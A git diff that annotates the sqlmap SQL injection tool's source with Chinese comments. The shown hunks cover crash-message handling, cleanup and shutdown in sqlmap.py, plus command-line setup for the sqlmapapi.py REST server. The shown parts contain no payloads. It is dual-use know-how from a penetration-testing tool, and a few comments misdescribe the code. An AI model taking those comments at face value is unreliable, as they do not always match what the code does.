+            raise SystemExit  # 退出程序
+
+        # 如果异常信息中包含只读文件系统的消息，则记录只读文件系统错误并退出
+        elif "Read-only file system" in excMsg:  # 检查异常信息是否包含只读文件系统
+            errMsg = "output device is mounted as read-only"  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果异常信息中包含系统资源不足的消息，则记录资源耗尽错误并退出
+        elif "Insufficient system resources" in excMsg:  # 检查异常信息是否包含系统资源不足
+            errMsg = "resource exhaustion detected"  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果异常信息中包含磁盘I/O错误的消息，则记录I/O错误并退出
+        elif "OperationalError: disk I/O error" in excMsg:  # 检查异常信息是否包含磁盘I/O错误
+            errMsg = "I/O error on output device"  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果异常信息中包含URL违反BIDI规则的消息，则记录无效URL错误并退出
+        elif "Violation of BIDI" in excMsg:  # 检查异常信息是否包含URL违反BIDI规则
+            errMsg = "invalid URL (violation of Bidi IDNA rule - RFC 5893)"  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果异常信息中包含无效IPv6 URL的消息，则记录无效URL错误并退出
+        elif "Invalid IPv6 URL" in excMsg:  # 检查异常信息是否包含无效IPv6 URL
+            errMsg = "invalid URL ('%s')" % excMsg.strip().split('\n')[-1]  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+
+        # 如果异常信息中包含临时文件访问问题的消息，则记录临时文件访问错误并退出
+        elif "_mkstemp_inner" in excMsg:  # 检查异常信息是否包含临时文件访问问题
+            errMsg = "there has been a problem while accessing temporary files"  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果异常信息中包含无法写入临时目录的消息，则记录临时目录写入错误并退出
+        elif any(_ in excMsg for _ in ("tempfile.mkdtemp", "tempfile.mkstemp", "tempfile.py")):  # 检查异常信息是否包含临时目录写入问题
+            errMsg = "unable to write to the temporary directory '%s'. " % tempfile.gettempdir()  # 生成错误信息
+            errMsg += "Please make sure that your disk is not full and "  # 添加提示信息
+            errMsg += "that you have sufficient write permissions to "  # 添加提示信息
+            errMsg += "create temporary files and/or directories"  # 添加提示信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果异常信息中包含权限拒绝的消息，则记录文件访问权限错误并退出
+        elif "Permission denied: '" in excMsg:  # 检查异常信息是否包含权限拒绝
+            match = re.search(r"Permission denied: '([^']*)", excMsg)  # 提取被拒绝访问的文件路径
+            errMsg = "permission error occurred while accessing file '%s'" % match.group(1)  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果异常信息中包含sqlalchemy包版本问题的消息，则记录sqlalchemy版本错误并退出
+        elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")):  # 检查异常信息是否包含sqlalchemy版本问题
+            errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) "  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果异常信息中包含Python版本问题的消息，则记录Python版本错误并退出
+        elif "invalid maximum character passed to PyUnicode_New" in excMsg and re.search(r"\A3\.[34]", sys.version) is not None:  # 检查异常信息是否包含Python版本问题
+            errMsg = "please upgrade the Python version (>= 3.5) "  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果异常信息中包含PyMySQL包版本问题的消息，则记录PyMySQL版本错误并退出
+        elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")):  # 检查异常信息是否包含PyMySQL版本问题
+            errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) "  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果异常信息中包含Python解
+        # 假设excMsg是一个包含异常信息的字符串变量
+
+        # 检查excMsg是否包含"pymysql"和"configparser"这两个字符串
+        elif all(_ in excMsg for _ in ("pymysql", "configparser")):  # 检查异常信息是否包含pymysql和configparser
+            errMsg = "wrong initialization of 'pymsql' detected (using Python3 dependencies)"  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 检查excMsg是否包含"ntlm"、"socket.error, err"和"SyntaxError"这三个字符串
+        elif all(_ in excMsg for _ in ("ntlm", "socket.error, err", "SyntaxError")):  # 检查异常信息是否包含ntlm、socket.error和SyntaxError
+            errMsg = "wrong initialization of 'python-ntlm' detected (using Python2 syntax)"  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 检查excMsg是否包含"drda"和"to_bytes"这两个字符串
+        elif all(_ in excMsg for _ in ("drda", "to_bytes")):  # 检查异常信息是否包含drda和to_bytes
+            errMsg = "wrong initialization of 'drda' detected (using Python3 syntax)"  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+        
+        # 检查excMsg是否包含特定的错误信息，即'WebSocket'对象没有'status'属性
+        elif "'WebSocket' object has no attribute 'status'" in excMsg:  # 检查异常信息是否包含WebSocket对象缺少status属性
+            errMsg = "wrong websocket library detected"  # 生成错误信息
+            errMsg += " (Reference: 'https://github.com/sqlmapproject/sqlmap/issues/4572#issuecomment-775041086')"  # 添加参考链接
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 检查excMsg是否包含特定的错误信息，即初始化GUI界面时出现问题
+        elif all(_ in excMsg for _ in ("window = tkinter.Tk()",)):  # 检查异常信息是否包含GUI初始化问题
+            errMsg = "there has been a problem in initialization of GUI interface "  # 生成错误信息
+            errMsg += "('%s')" % excMsg.strip().split('\n')[-1]  # 添加具体错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 检查excMsg是否包含特定的错误信息，即使用了不同版本的sqlmap文件
+        elif any(_ in excMsg for _ in ("unable to access item 'liveTest'",)):  # 检查异常信息是否包含不同版本sqlmap文件问题
+            errMsg = "detected usage of files from different versions of sqlmap"  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 检查errMsg是否包含特定的错误信息，即版本号相关的错误
+        elif any(_ in errMsg for _ in (": 9.9.9#",)):  # 检查错误信息是否包含特定版本号
+            errMsg = "LOL xD"  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 检查是否设置了键盘中断的标记
+        elif kb.get("dumpKeyboardInterrupt"):  # 检查是否设置了键盘中断标记
+            raise SystemExit  # 退出程序
+
+        # 检查excMsg是否包含特定的错误信息，即"Broken pipe"
+        elif any(_ in excMsg for _ in ("Broken pipe",)):  # 检查异常信息是否包含Broken pipe
+            raise SystemExit  # 退出程序
+
+        # 检查valid变量是否为False
+        elif valid is False:  # 检查校验和是否无效
+            errMsg = "code checksum failed (turning off automatic issue creation). "  # 生成错误信息
+            errMsg += "You should retrieve the latest development version from official GitHub "  # 添加提示信息
+            errMsg += "repository at '%s'" % GIT_PAGE  # 添加GitHub仓库链接
+            logger.critical(errMsg)  # 记录严重错误信息
+            print()  # 打印空行
+            dataToStdout(excMsg)  # 输出异常信息到标准输出
+            raise SystemExit  # 退出程序
+
+        # 检查errMsg和excMsg组合后是否包含特定的错误信息，即文件路径或特定参数
+        elif any(_ in "%s\n%s" % (errMsg, excMsg) for _ in ("tamper/", "waf/", "--engagement-dojo")):  # 检查错误信息是否包含特定路径或参数
+            logger.critical(errMsg)  # 记录严重错误信息
+            print()  # 打印空行
+            dataToStdout(excMsg)  # 输出异常信息到标准输出
+            raise SystemExit  # 退出程序
+
+        # 检查错误信息中是否包含特定的错误关键词，如果包含，则认为是运行时环境错误，并提取错误信息的最后部分。
+        elif any(_ in excMsg for _ in ("ImportError", "ModuleNotFoundError", "<frozen", "Can't find file for module", "SAXReaderNotAvailable", "<built-in function compile> returned NULL without setting an exception", "source code string cannot contain null bytes", "No module named", "tp_name field", "module 'sqlite3' has no attribute 'OperationalError'")):  # 检查异常信息是否包含运行时环境错误
+            errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip()  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果错误信息包含非ASCII字符编码错误，则认为是运行时环境错误，并提取错误信息的最后部分。
+        elif all(_ in excMsg for _ in ("SyntaxError: Non-ASCII character", ".py on line", "but no encoding declared")):  # 检查异常信息是否包含非ASCII字符编码错误
+            errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip()  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果错误信息包含文件不存在的错误，则认为是运行时环境错误，并提取错误信息的最后部分。
+        elif all(_ in excMsg for _ in ("FileNotFoundError: [Errno 2] No such file or directory", "cwd = os.getcwd()")):  # 检查异常信息是否包含文件不存在错误
+            errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip()  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果错误信息包含权限错误，则提示用户可能存在权限问题，并建议重新运行程序时禁用多进程。
+        elif all(_ in excMsg for _ in ("PermissionError: [WinError 5]", "multiprocessing")):  # 检查异常信息是否包含权限错误
+            errMsg = "there is a permission problem in running multiprocessing on this system. "  # 生成错误信息
+            errMsg += "Please rerun with '--disable-multi'"  # 添加建议信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果错误信息包含文件不存在的错误，则提示用户安装可能已损坏，并建议从官方GitHub仓库获取最新开发版本。
+        elif all(_ in excMsg for _ in ("No such file", "_'")):  # 检查异常信息是否包含文件不存在错误
+            errMsg = "corrupted installation detected ('%s'). " % excMsg.strip().split('\n')[-1]  # 生成错误信息
+            errMsg += "You should retrieve the latest development version from official GitHub "  # 添加提示信息
+            errMsg += "repository at '%s'" % GIT_PAGE  # 添加GitHub仓库链接
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果错误信息包含尝试在生产环境中运行开发测试的错误，则输出相应的错误信息。
+        elif all(_ in excMsg for _ in ("No such file", "sqlmap.conf", "Test")):  # 检查异常信息是否包含在生产环境中运行开发测试的错误
+            errMsg = "you are trying to run (hidden) development tests inside the production environment"  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果错误信息包含HTTP NTLM认证相关的兼容性问题，则输出相应的错误信息，并提供参考链接。
+        elif all(_ in excMsg for _ in ("HTTPNtlmAuthHandler", "'str' object has no attribute 'decode'")):  # 检查异常信息是否包含HTTP NTLM认证兼容性问题
+            errMsg = "package 'python-ntlm' has a known compatibility issue with the "  # 生成错误信息
+            errMsg += "Python 3 (Reference: 'https://github.com/mullender/python-ntlm/pull/61&#39;)&#34; "  # 添加参考链接
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果错误信息包含字典对象属性错误，并且与枚举相关，则提示用户可能存在枚举问题，并建议重新运行程序时刷新会话。
+        elif "'DictObject' object has no attribute '" in excMsg and all(_ in errMsg for _ in ("(fingerprinted)", "(identified)")):  # 检查异常信息是否包含字典对象属性错误
+            errMsg = "there has been a problem in enumeration. "  # 生成错误信息
+            errMsg += "Because of a considerable chance of false-positive case "  # 添加提示信息
+            errMsg += "you are advised to rerun with switch '--flush-session'"  # 添加建议信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果错误信息包含数据库磁盘映像损坏的错误，则提示用户会话文件可能损坏，并建议刷新会话。
+        elif "database disk image is malformed" in excMsg:  # 检查异常信息是否包含数据库磁盘映像损坏
+            errMsg = "local session file seems to be malformed. Please rerun with '--flush-session'"  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果错误信息包含模块属性错误，则认为是运行时环境错误，并提取错误信息的最后部分。
+        elif "AttributeError: 'module' object has no attribute 'F_GETFD'" in excMsg:  # 检查异常信息是否包含模块属性错误
+            errMsg = "invalid runtime (\"%s\") " % excMsg.split("Error: ")[-1].strip()  # 生成错误信息
+            errMsg += "(Reference: 'https://stackoverflow.com/a/38841364&#39;  & 'https://bugs.python.org/issue24944#msg249231&#39;)&#34; "  # 添加参考链接
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+
+        # 如果错误信息包含marshal数据错误，则提示用户.pyc文件可能损坏，并建议删除.pyc文件来解决问题。
+        elif "bad marshal data (unknown type code)" in excMsg:  # 检查异常信息是否包含marshal数据错误
+            match = re.search(r"\s*(.+)\s+ValueError", excMsg)  # 提取损坏的文件路径
+            errMsg = "one of your .pyc files are corrupted%s" % (" ('%s')" % match.group(1) if match else "")  # 生成错误信息
+            errMsg += ". Please delete .pyc files on your system to fix the problem"  # 添加建议信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 遍历异常信息中的文件路径，并对其进行规范化处理
+        for match in re.finditer(r'File "(.+?)", line', excMsg):  # 查找异常信息中的文件路径
+            file_ = match.group(1)  # 提取文件路径
             try:
-                file_ = os.path.relpath(file_, os.path.dirname(__file__))
-            except ValueError:
-                pass
-            file_ = file_.replace("\\", '/')
-            if "../" in file_:
-                file_ = re.sub(r"(\.\./)+", '/', file_)
+                file_ = os.path.relpath(file_, os.path.dirname(__file__))  # 将文件路径转换为相对路径
+            except ValueError:  # 捕获路径转换错误
+                pass  # 忽略错误
+            file_ = file_.replace("\\", '/')  # 将路径中的反斜杠替换为正斜杠
+            if "../" in file_:  # 检查路径中是否包含上级目录
+                file_ = re.sub(r"(\.\./)+", '/', file_)  # 替换上级目录为单斜杠
             else:
-                file_ = file_.lstrip('/')
-            file_ = re.sub(r"/{2,}", '/', file_)
-            excMsg = excMsg.replace(match.group(1), file_)
+                file_ = file_.lstrip('/')  # 去除路径开头的斜杠
+            file_ = re.sub(r"/{2,}", '/', file_)  # 将多个斜杠替换为单斜杠
+            excMsg = excMsg.replace(match.group(1), file_)  # 更新异常信息中的文件路径
 
-        errMsg = maskSensitiveData(errMsg)
-        excMsg = maskSensitiveData(excMsg)
+        # 对错误信息和异常信息进行敏感数据掩码处理
+        errMsg = maskSensitiveData(errMsg)  # 掩码处理错误信息中的敏感数据
+        excMsg = maskSensitiveData(excMsg)  # 掩码处理异常信息中的敏感数据
 
-        if conf.get("api") or not valid:
-            logger.critical("%s\n%s" % (errMsg, excMsg))
+        # 如果配置了API或校验和无效，则记录错误信息和异常信息
+        if conf.get("api") or not valid:  # 检查是否配置了API或校验和无效
+            logger.critical("%s\n%s" % (errMsg, excMsg))  # 记录严重错误信息和异常信息
         else:
-            logger.critical(errMsg)
-            dataToStdout("%s\n" % setColor(excMsg.strip(), level=logging.CRITICAL))
-            createGithubIssue(errMsg, excMsg)
+            logger.critical(errMsg)  # 记录严重错误信息
+            dataToStdout("%s\n" % setColor(excMsg.strip(), level=logging.CRITICAL))  # 输出带颜色的异常信息到标准输出
+            createGithubIssue(errMsg, excMsg)  # 创建GitHub问题
 
-    finally:
-        kb.threadContinue = False
+    finally:  # 无论是否发生异常，最终都会执行的代码块
+        kb.threadContinue = False  # 设置线程继续标志为False
 
-        if (getDaysFromLastUpdate() or 0) > LAST_UPDATE_NAGGING_DAYS:
-            warnMsg = "your sqlmap version is outdated"
-            logger.warning(warnMsg)
+        # 如果距离上次更新的天数超过指定值，则提示用户版本过时
+        if (getDaysFromLastUpdate() or 0) > LAST_UPDATE_NAGGING_DAYS:  # 检查距离上次更新的天数
+            warnMsg = "your sqlmap version is outdated"  # 生成警告信息
+            logger.warning(warnMsg)  # 记录警告信息
 
-        if conf.get("showTime"):
-            dataToStdout("\n[*] ending @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True)
+        # 如果配置了显示时间，则输出结束时间
+        if conf.get("showTime"):  # 检查是否配置了显示时间
+            dataToStdout("\n[*] ending @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True)  # 输出结束时间
 
-        kb.threadException = True
+        kb.threadException = True  # 设置线程异常标志为True
 
-        if kb.get("tempDir"):
-            for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING, MKSTEMP_PREFIX.COOKIE_JAR, MKSTEMP_PREFIX.BIG_ARRAY):
-                for filepath in glob.glob(os.path.join(kb.tempDir, "%s*" % prefix)):
+        # 如果存在临时目录，则清理临时文件
+        if kb.get("tempDir"):  # 检查是否存在临时目录
+            for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING, MKSTEMP_PREFIX.COOKIE_JAR, MKSTEMP_PREFIX.BIG_ARRAY):  # 遍历临时文件前缀
+                for filepath in glob.glob(os.path.join(kb.tempDir, "%s*" % prefix)):  # 查找匹配的临时文件
                     try:
-                        os.remove(filepath)
-                    except OSError:
-                        pass
+                        os.remove(filepath)  # 删除临时文件
+                    except OSError:  # 捕获文件删除错误
+                        pass  # 忽略错误
 
-            if not filterNone(filepath for filepath in glob.glob(os.path.join(kb.tempDir, '*')) if not any(filepath.endswith(_) for _ in (".lock", ".exe", ".so", '_'))):  # ignore junk files
+            # 如果临时目录中没有其他文件，则删除临时目录
+            if not filterNone(filepath for filepath in glob.glob(os.path.join(kb.tempDir, '*')) if not any(filepath.endswith(_) for _ in (".lock", ".exe", ".so", '_'))):  # 检查临时目录是否为空
+                # 使用glob模块获取临时目录中的所有文件路径，并过滤掉以.lock、.exe、.so或_结尾的文件
                 try:
-                    shutil.rmtree(kb.tempDir, ignore_errors=True)
-                except OSError:
-                    pass
+                    shutil.rmtree(kb.tempDir, ignore_errors=True)  # 删除临时目录，ignore_errors=True表示忽略删除过程中可能出现的错误
+                except OSError:  # 捕获目录删除错误
+                    pass  # 忽略错误，继续执行后续代码
+
 
-        if conf.get("hashDB"):
-            conf.hashDB.flush(True)
-            conf.hashDB.close()         # NOTE: because of PyPy
+        if conf.get("hashDB"):  # 检查配置中是否存在hashDB
+            conf.hashDB.flush(True)  # 将hashDB中的数据刷新到磁盘
+            conf.hashDB.close()         # 关闭hashDB连接，NOTE: 由于PyPy的原因需要显式关闭
 
-        if conf.get("harFile"):
+        if conf.get("harFile"):  # 检查配置中是否存在harFile
             try:
-                with openFile(conf.harFile, "w+b") as f:
-                    json.dump(conf.httpCollector.obtain(), fp=f, indent=4, separators=(',', ': '))
-            except SqlmapBaseException as ex:
-                errMsg = getSafeExString(ex)
-                logger.critical(errMsg)
+                with openFile(conf.harFile, "w+b") as f:  # 以二进制写模式打开harFile
+                    json.dump(conf.httpCollector.obtain(), fp=f, indent=4, separators=(',', ': '))  # 将HTTP收集器中的数据以JSON格式写入文件
+            except SqlmapBaseException as ex:  # 捕获sqlmap基础异常
+                errMsg = getSafeExString(ex)  # 获取异常的安全字符串表示
+                logger.critical(errMsg)  # 记录严重错误日志
 
-        if conf.get("api"):
-            conf.databaseCursor.disconnect()
+        if conf.get("api"):  # 检查配置中是否存在api
+            conf.databaseCursor.disconnect()  # 断开数据库游标连接
 
-        if conf.get("dumper"):
-            conf.dumper.flush()
+        if conf.get("dumper"):  # 检查配置中是否存在dumper
+            conf.dumper.flush()  # 刷新dumper中的数据
 
         # short delay for thread finalization
-        _ = time.time()
-        while threading.active_count() > 1 and (time.time() - _) > THREAD_FINALIZATION_TIMEOUT:
-            time.sleep(0.01)
+        _ = time.time()  # 获取当前时间
+        while threading.active_count() > 1 and (time.time() - _) > THREAD_FINALIZATION_TIMEOUT:  # 检查当前活跃线程数是否大于1，并且等待时间是否超过线程最终化超时时间
+            time.sleep(0.01)  # 等待0.01秒，避免CPU占用过高
+
+        if cmdLineOptions.get("sqlmapShell"):  # 检查命令行选项中是否存在sqlmapShell
+            cmdLineOptions.clear()  # 清空命令行选项
+            conf.clear()  # 清空配置
+            kb.clear()  # 清空知识库
+            conf.disableBanner = True  # 禁用启动横幅
+            main()  # 调用主函数重新启动sqlmap
 
-        if cmdLineOptions.get("sqlmapShell"):
-            cmdLineOptions.clear()
-            conf.clear()
-            kb.clear()
-            conf.disableBanner = True
-            main()
 
+# 检查是否是作为主模块运行，如果是，则执行以下代码
 if __name__ == "__main__":
     try:
+        # 尝试调用main函数
         main()
     except KeyboardInterrupt:
+        # 如果用户按下Ctrl+C（键盘中断），则捕获KeyboardInterrupt异常，但不执行任何操作（pass表示空操作）
         pass
     except SystemExit:
+        # 如果程序调用了sys.exit()，则重新抛出SystemExit异常，允许正常退出流程
         raise
     except:
+        # 捕获其他所有异常，并打印异常信息
         traceback.print_exc()
     finally:
-        # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program
+        # 无论try块中的代码是否成功执行，都会执行finally块中的代码
+        # 参考：http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program
+        # 检查当前线程数量是否大于1（主线程和至少一个其他线程）
         if threading.active_count() > 1:
+            # 如果大于1，则调用os._exit强制退出程序，不进行清理操作
+            # getattr(os, "_exitcode", 0)用于获取os模块的_exitcode属性，如果不存在则默认为0
             os._exit(getattr(os, "_exitcode", 0))
         else:
+            # 如果只有主线程，则正常退出程序
             sys.exit(getattr(os, "_exitcode", 0))
 else:
-    # cancelling postponed imports (because of CI/CD checks)
-    __import__("lib.controller.controller")
+    # 如果不是作为主模块运行，则取消延迟导入（因为CI/CD检查）
+    __import__("lib.controller.controller")
\ No newline at end of file
diff --git a/src/sqlmap-master/sqlmapapi.py b/src/sqlmap-master/sqlmapapi.py
index 8527f1e..07e64a0 100644
--- a/src/sqlmap-master/sqlmapapi.py
+++ b/src/sqlmap-master/sqlmapapi.py
@@ -5,114 +5,114 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
-import sys
+import sys  # 导入sys模块，用于处理与Python解释器相关的操作
 
-sys.dont_write_bytecode = True
+sys.dont_write_bytecode = True  # 设置不生成.pyc字节码文件，以减少磁盘空间占用和加载时间
 
-__import__("lib.utils.versioncheck")  # this has to be the first non-standard import
+__import__("lib.utils.versioncheck")  # 动态导入lib.utils.versioncheck模块，通常用于检查版本兼容性
 
-import logging
-import os
-import warnings
+import logging  # 导入logging模块，用于记录日志信息
+import os  # 导入os模块，用于与操作系统进行交互
+import warnings  # 导入warnings模块，用于处理警告信息
 
-warnings.filterwarnings(action="ignore", category=UserWarning)
-warnings.filterwarnings(action="ignore", category=DeprecationWarning)
+warnings.filterwarnings(action="ignore", category=UserWarning)  # 忽略所有UserWarning类别的警告
+warnings.filterwarnings(action="ignore", category=DeprecationWarning)  # 忽略所有DeprecationWarning类别的警告
 
 try:
-    from optparse import OptionGroup
-    from optparse import OptionParser as ArgumentParser
+    from optparse import OptionGroup  # 从optparse模块导入OptionGroup类，用于处理命令行选项组
+    from optparse import OptionParser as ArgumentParser  # 从optparse模块导入OptionParser类，并将其重命名为ArgumentParser
 
-    ArgumentParser.add_argument = ArgumentParser.add_option
+    ArgumentParser.add_argument = ArgumentParser.add_option  # 将ArgumentParser的add_option方法重命名为add_argument，以兼容argparse的API
 
-    def _add_argument(self, *args, **kwargs):
+    def _add_argument(self, *args, **kwargs):  # 定义一个辅助函数_add_argument，用于将add_argument方法映射到add_option方法
         return self.add_option(*args, **kwargs)
 
-    OptionGroup.add_argument = _add_argument
-
-except ImportError:
-    from argparse import ArgumentParser
-
-finally:
-    def get_actions(instance):
-        for attr in ("option_list", "_group_actions", "_actions"):
-            if hasattr(instance, attr):
-                return getattr(instance, attr)
-
-    def get_groups(parser):
-        return getattr(parser, "option_groups", None) or getattr(parser, "_action_groups")
-
-    def get_all_options(parser):
-        retVal = set()
-
-        for option in get_actions(parser):
-            if hasattr(option, "option_strings"):
-                retVal.update(option.option_strings)
-            else:
-                retVal.update(option._long_opts)
-                retVal.update(option._short_opts)
-
-        for group in get_groups(parser):
-            for option in get_actions(group):
-                if hasattr(option, "option_strings"):
-                    retVal.update(option.option_strings)
-                else:
-                    retVal.update(option._long_opts)
-                    retVal.update(option._short_opts)
-
-        return retVal
-
-from lib.core.common import getUnicode
-from lib.core.common import setPaths
-from lib.core.data import logger
-from lib.core.patch import dirtyPatches
-from lib.core.patch import resolveCrossReferences
-from lib.core.settings import RESTAPI_DEFAULT_ADAPTER
-from lib.core.settings import RESTAPI_DEFAULT_ADDRESS
-from lib.core.settings import RESTAPI_DEFAULT_PORT
-from lib.core.settings import UNICODE_ENCODING
-from lib.utils.api import client
-from lib.utils.api import server
+    OptionGroup.add_argument = _add_argument  # 将OptionGroup的add_argument方法映射到_add_argument函数
+
+except ImportError:  # 如果导入optparse模块失败（例如在Python 3中），则执行以下代码
+    from argparse import ArgumentParser  # 从argparse模块导入ArgumentParser类，用于处理命令行参数
+
+finally:  # 无论try块中的代码是否成功执行，finally块中的代码都会执行
+    def get_actions(instance):  # 定义一个函数get_actions，用于获取命令行解析器实例中的选项列表
+        for attr in ("option_list", "_group_actions", "_actions"):  # 遍历可能的属性名称
+            if hasattr(instance, attr):  # 如果实例具有该属性
+                return getattr(instance, attr)  # 返回该属性的值
+
+    def get_groups(parser):  # 定义一个函数get_groups，用于获取命令行解析器中的选项组
+        return getattr(parser, "option_groups", None) or getattr(parser, "_action_groups")  # 返回解析器中的选项组，如果不存在则返回None
+
+    def get_all_options(parser):  # 定义一个函数get_all_options，用于获取命令行解析器中的所有选项
+        retVal = set()  # 创建一个空集合，用于存储所有选项
+
+        for option in get_actions(parser):  # 遍历解析器中的选项
+            if hasattr(option, "option_strings"):  # 如果选项具有option_strings属性
+                retVal.update(option.option_strings)  # 将选项字符串添加到集合中
+            else:  # 否则
+                retVal.update(option._long_opts)  # 将长选项添加到集合中
+                retVal.update(option._short_opts)  # 将短选项添加到集合中
+
+        for group in get_groups(parser):  # 遍历解析器中的选项组
+            for option in get_actions(group):  # 遍历选项组中的选项
+                if hasattr(option, "option_strings"):  # 如果选项具有option_strings属性
+                    retVal.update(option.option_strings)  # 将选项字符串添加到集合中
+                else:  # 否则
+                    retVal.update(option._long_opts)  # 将长选项添加到集合中
+                    retVal.update(option._short_opts)  # 将短选项添加到集合中
+
+        return retVal  # 返回包含所有选项的集合
+
+
+from lib.core.common import getUnicode  # 从lib.core.common模块导入getUnicode函数，用于将字符串转换为Unicode格式
+from lib.core.common import setPaths  # 从lib.core.common模块导入setPaths函数，用于设置文件路径
+from lib.core.data import logger  # 从lib.core.data模块导入logger对象，用于记录日志信息
+from lib.core.patch import dirtyPatches  # 从lib.core.patch模块导入dirtyPatches函数，用于应用临时补丁
+from lib.core.patch import resolveCrossReferences  # 从lib.core.patch模块导入resolveCrossReferences函数，用于解决交叉引用问题
+from lib.core.settings import RESTAPI_DEFAULT_ADAPTER  # 从lib.core.settings模块导入RESTAPI_DEFAULT_ADAPTER常量，表示默认的服务器适配器
+from lib.core.settings import RESTAPI_DEFAULT_ADDRESS  # 从lib.core.settings模块导入RESTAPI_DEFAULT_ADDRESS常量，表示默认的服务器地址
+from lib.core.settings import RESTAPI_DEFAULT_PORT  # 从lib.core.settings模块导入RESTAPI_DEFAULT_PORT常量，表示默认的服务器端口
+from lib.core.settings import UNICODE_ENCODING  # 从lib.core.settings模块导入UNICODE_ENCODING常量，表示默认的Unicode编码
+from lib.utils.api import client  # 从lib.utils.api模块导入client函数，用于启动REST-JSON API客户端
+from lib.utils.api import server  # 从lib.utils.api模块导入server函数，用于启动REST-JSON API服务器
 
 try:
-    from sqlmap import modulePath
-except ImportError:
-    def modulePath():
-        return getUnicode(os.path.dirname(os.path.realpath(__file__)), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
+    from sqlmap import modulePath  # 从sqlmap模块导入modulePath函数，用于获取模块路径
+except ImportError:  # 如果导入失败（例如sqlmap模块不存在），则执行以下代码
+    def modulePath():  # 定义一个函数modulePath，用于获取当前模块的路径
+        return getUnicode(os.path.dirname(os.path.realpath(__file__)), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)  # 返回当前文件的目录路径，并将其转换为Unicode格式
 
-def main():
+def main():  # 定义main函数，作为REST-JSON API的入口函数
     """
     REST-JSON API main function
     """
 
-    dirtyPatches()
-    resolveCrossReferences()
+    dirtyPatches()  # 应用临时补丁
+    resolveCrossReferences()  # 解决交叉引用问题
 
     # Set default logging level to debug
-    logger.setLevel(logging.DEBUG)
+    logger.setLevel(logging.DEBUG)  # 设置日志记录级别为DEBUG，以便记录详细信息
 
     # Initialize paths
-    setPaths(modulePath())
+    setPaths(modulePath())  # 初始化文件路径，使用modulePath函数获取当前模块路径
 
     # Parse command line options
-    apiparser = ArgumentParser()
-    apiparser.add_argument("-s", "--server", help="Run as a REST-JSON API server", action="store_true")
-    apiparser.add_argument("-c", "--client", help="Run as a REST-JSON API client", action="store_true")
-    apiparser.add_argument("-H", "--host", help="Host of the REST-JSON API server (default \"%s\")" % RESTAPI_DEFAULT_ADDRESS, default=RESTAPI_DEFAULT_ADDRESS)
-    apiparser.add_argument("-p", "--port", help="Port of the REST-JSON API server (default %d)" % RESTAPI_DEFAULT_PORT, default=RESTAPI_DEFAULT_PORT, type=int)
